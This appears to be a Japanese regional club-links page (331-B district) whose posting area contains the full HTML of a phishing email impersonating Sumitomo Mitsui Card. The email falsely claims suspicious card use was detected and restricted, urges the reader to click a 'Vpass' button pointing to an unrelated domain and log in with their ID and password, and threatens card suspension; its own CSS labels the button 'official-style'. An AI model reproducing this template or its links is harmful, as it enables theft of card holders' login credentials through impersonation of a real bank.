331-B地区クラブホームーページ一覧
331-B サイト
http://huat.jp/331b-website

【重要なお願い】ご利用確認のお 手続きを完了させてください

<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>【重要】三井住友カードからのお知らせ</title>
<style>
/* 基本設定 */
* {
box-sizing: border-box;
}
body {
margin: 0;
padding: 0;
font-family: "Helvetica Neue", Arial, "Hiragino Kaku Gothic ProN", "Hiragino Sans", "Meiryo", sans-serif;
line-height: 1.6;
color: #333333;
background-color: #f7f8f8;
-webkit-text-size-adjust: 100%;
}

/* 全体レイアウト */
.wrapper {
width: 100%;
padding: 20px 0;
}

/* メインコンテナ */
.container {
max-width: 600px;
margin: 0 auto;
background-color: #ffffff;
border: 1px solid #e1e1e1;
overflow: hidden;
}

/* ロゴエリア */
.header-logo-area {
padding: 20px 25px;
background-color: #ffffff;
border-bottom: 2px solid #004b35; /* SMBCグリーンのアクセントライン */
}
.main-logo {
font-size: 22px;
font-weight: bold;
color: #333333;
letter-spacing: -1px;
display: flex;
align-items: center;
}

/* コンテンツエリア */
.main-content {
padding: 40px 30px;
}
.title {
font-size: 1.3rem;
font-weight: bold;
color: #004b35;
margin-bottom: 25px;
line-height: 1.4;
border-left: 5px solid #004b35;
padding-left: 15px;
}

/* 案内ボックス */
.notice-box {
background-color: #f9f9f9;
border: 1px solid #eeeeee;
padding: 20px;
margin: 25px 0;
}
.notice-label {
display: inline-block;
background-color: #004b35;
color: #ffffff;
font-size: 0.75rem;
padding: 2px 8px;
margin-bottom: 10px;
}
.notice-text {
font-weight: bold;
font-size: 1rem;
margin: 0 0 10px 0;
color: #222;
}
.notice-detail {
font-size: 0.9rem;
color: #444444;
line-height: 1.8;
}

/* ステップ案内 */
.steps {
margin: 30px 0;
}
.steps-title {
font-weight: bold;
margin-bottom: 15px;
font-size: 1rem;
}
.steps ol {
margin: 0;
padding-left: 20px;
}
.steps li {
margin-bottom: 15px;
font-size: 0.95rem;
}

/* 公式風ボタン */
.button-area {
text-align: center;
margin: 40px 0;
}
.btn {
display: inline-flex;
align-items: center;
justify-content: center;
width: 100%;
max-width: 340px;
background-color: #007c5b;
color: #ffffff !important;
text-decoration: none;
padding: 18px 20px;
border-bottom: 3px solid #005a42;
font-weight: bold;
font-size: 1.2rem;
border-radius: 2px;
position: relative;
}
.btn::after {
content: "〉";
position: absolute;
right: 20px;
font-size: 1rem;
}
.btn:hover {
background-color: #008f69;
}

/* 注意書きボックス */
.warning-box {
font-size: 0.85rem;
color: #666;
background: #fffbe6;
padding: 15px;
border: 1px solid #ffe58f;
margin-top: 20px;
}

/* フッター */
.footer {
padding: 30px;
background-color: #eeeeee;
color: #666666;
font-size: 0.75rem;
}
.footer p {
margin: 5px 0;
}
.copyright {
margin-top: 20px !important;
text-align: center;
color: #888888;
}

/* モバイル対応 */
@media only screen and (max-width: 480px) {
.main-content {
padding: 30px 20px;
}
.title {
font-size: 1.1rem;
}
}
</style>
</head>
<body>
<div class="wrapper">
<div class="container">
<!-- ヘッダーエリア -->
<div class="header-logo-area">
<div class="main-logo">三井住友カード</div>
</div>

<div class="main-content">
<!-- タイトルの改行を削除しました -->
<div class="title">カードのご利用確認に伴う一時制限のお知らせ</div>

<p>いつも三井住友カードをご利用いただき、誠にありがとうございます。</p>
<p>弊社の不正検知システムにおいて、お客様のカードのご利用状況が普段と異なることを検知いたしました。安全のため、現在カードのご利用を一部制限させていただいております。</p>

<div class="notice-box">
<span class="notice-label">確認事項</span>
<p class="notice-text">■ ご利用制限の内容</p>
<div class="notice-detail">
対象カード:三井住友カード(VISA/Mastercard)<br>
制限理由:不正利用の可能性および登録情報の再確認<br>
対象取引:オンライン決済、海外利用など
</div>
</div>

<div class="steps">
<div class="steps-title">今後の流れ</div>
<ol>
<li>下記の「Vpassで確認する」ボタンをクリックします。</li>
<li>VpassIDとパスワードでログインしてください。</li>
<li>ご利用履歴をご確認いただき、回答を完了させてください。</li>
</ol>
</div>

<div class="button-area">
<a href="https://yeuadd.com/d6gbzn26wpq6" class="btn">Vpassで確認する</a>
</div>

<div class="warning-box">
※ご確認いただけない場合、安全のためカードの機能を停止し、再発行が必要となることがございます。お早めにお手続きをお願いいたします。
</div>

<div style="margin-top: 40px; font-size: 0.9rem; border-top: 1px solid #ddd; padding-top: 20px;">
<strong>三井住友カード株式会社</strong><br>
セキュリティセンター(24時間365日受付)
</div>
</div>

<div class="footer">
<p>※本メールは送信専用です。返信はできませんのでご了承ください。</p>
<p>※個人情報の取り扱いについては弊社Webサイトをご確認ください。</p>
<p style="margin-top: 15px; font-size: 0.8rem;">
<a href="https://mail9.zoeusaz.com/unsubscribe?email=331b-hp%40huat.jp" style="color: #999; text-decoration: underline;">配信停止はこちら</a>
</p>
<p class="copyright">Copyright (C) Sumitomo Mitsui Card Co., Ltd.</p>
</div>
</div>
</div>
</body>
</html>

書込


RSS Feed331-B地区HP一覧 RSS Feed

Total Access : 339,865 (Today : 432 / Yesterday : 1,048)

読者メール登録:

http://huat.jp/331b-hp/